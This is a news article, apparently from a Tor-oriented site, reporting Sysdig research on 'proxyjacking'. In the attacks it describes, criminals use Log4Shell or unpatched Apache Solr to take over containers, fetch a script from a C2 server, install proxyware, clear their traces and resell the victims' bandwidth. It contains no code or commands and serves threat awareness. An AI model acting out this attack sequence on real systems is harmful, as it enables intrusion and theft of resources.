BTC $55865.7639
ETH $3222.4858
BNB $400.6682
SOL $110.6842
XRP $0.5548
ADA $0.6230
AVAX $39.2767
DOGE $0.0896
TRX $0.1404
wstETH $3751.1765
LINK $19.0474
DOT $8.0594
WETH $3236.9354
MATIC $1.0625
UNI $10.5983
WBTC $55965.3668
IMX $3.3901
ICP $13.0143
BCH $300.6764
LTC $74.8911
CAKE $3.2355
FIL $8.1517
ETC $28.1561
RNDR $7.4096
KAS $0.1718
DAI $0.9979
HBAR $0.1117
ATOM $11.3293
VET $0.0491
INJ $36.5642
TON $2.1072
OKB $51.3395
LDO $3.5443
FDUSD $1.0015
STX $3.0723
ARB $1.9162
NEAR $4.0168
XMR $131.7677
TIA $17.0755
XLM $0.1186
GRT $0.2823
ENS $22.2643
THETA $2.1117
MKR $2155.4331
WEMIX $2.1023
APEX $2.4575
BEAM $0.0357
BTC $55865.7639
ETH $3222.4858
BNB $400.6682
SOL $110.6842
XRP $0.5548
ADA $0.6230
AVAX $39.2767
DOGE $0.0896
TRX $0.1404
wstETH $3751.1765
LINK $19.0474
DOT $8.0594
WETH $3236.9354
MATIC $1.0625
UNI $10.5983
WBTC $55965.3668
IMX $3.3901
ICP $13.0143
BCH $300.6764
LTC $74.8911
CAKE $3.2355
FIL $8.1517
ETC $28.1561
RNDR $7.4096
KAS $0.1718
DAI $0.9979
HBAR $0.1117
ATOM $11.3293
VET $0.0491
INJ $36.5642
TON $2.1072
OKB $51.3395
LDO $3.5443
FDUSD $1.0015
STX $3.0723
ARB $1.9162
NEAR $4.0168
XMR $131.7677
TIA $17.0755
XLM $0.1186
GRT $0.2823
ENS $22.2643
THETA $2.1117
MKR $2155.4331
WEMIX $2.1023
APEX $2.4575
BEAM $0.0357
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • Proxyjacking has become a profitable business for cybercriminals

    The Sysdig Threat Research Team has discovered a new attack vector based on the interception of legitimate proxy services that allow people to sell part of their bandwidth to third parties.

    Sysdig researchers said that a new attack vector called "proxyjacking" allows cybercriminals to earn hundreds of thousands of dollars a month in the form of passive income.

    According to Kaspersky Lab, proxy services work like this: The user installs a client that creates a proxy server. The client makes the Internet connection of the device available to an external party - a proxy service, which then resells part of the user's bandwidth to other people.

    Proxy technology has found use among users who use someone else's IP address to bypass geoblocks or view dubious websites without being tied to their own IP address. Usually, people pay per IP address based on the number of hours the application is running.

    In one of the attacks observed by Sysdig researchers, attackers compromised a container in the cloud using a Log4j vulnerability (Log4Shell) and then installed a proxy client that turned the system into a proxy server without the knowledge of the container owner. The attacker then sold the IP address of the compromised device to a proxy service.

    Typically, Log4j attacks involve a hacker downloading a backdoor or cryptojacking payload onto a device. Crystal Morin, threat research engineer at Sysdig, said that proxyjacking is similar to cryptojacking in that they both benefit from the victim's bandwidth - and both are about equally beneficial to the attacker. However, the two attacks differ in that the miner uses CPU resources, while proxyjacking uses network resources, with minimal CPU load.

    Morin noted that the impact of proxyjacking on the system is negligible: 1 GB of network traffic distributed over the course of a month amounts to tens of megabytes per day - it is very likely that the attack will go unnoticed.

    In the discovered attack, hackers compromised an unpatched Apache Solr service running on a Kubernetes infrastructure in order to take control of a container in the environment. Then the cybercriminals downloaded a malicious script from the C2 server, which they placed in the "/tmp" folder in order to be able to use the compromised module to make money.

    The researchers noticed that the attackers tried to cover up traces of malicious activity by clearing the history and deleting the downloaded binary file, as well as temporary files.

    Researchers estimate that for 24 hours of work from a single hacked IP address, an attacker can earn $9.60 per month. Experts noted that if 100 IP addresses are compromised, a cybercriminal can earn passive income of almost $1,000 per month.

    When using Log4j on unpatched systems, this figure could be even higher, as millions of servers are still running vulnerable versions of the logging tool, and according to Censys, more than 23,000 of them are available online. “Theoretically, the Log4j vulnerability alone could bring an attacker more than $220,000 in profit per month,” Morin said.

    To avoid huge bills for using proxies, organizations should set billing limits and verification tool alerts, the researchers say.

    Author DeepWeb
    ARES group lures former BreachForums users to their own sites
    Hundred Finance Loses $7M in DeFi Protocol Hack

    Comments 0

    Add comment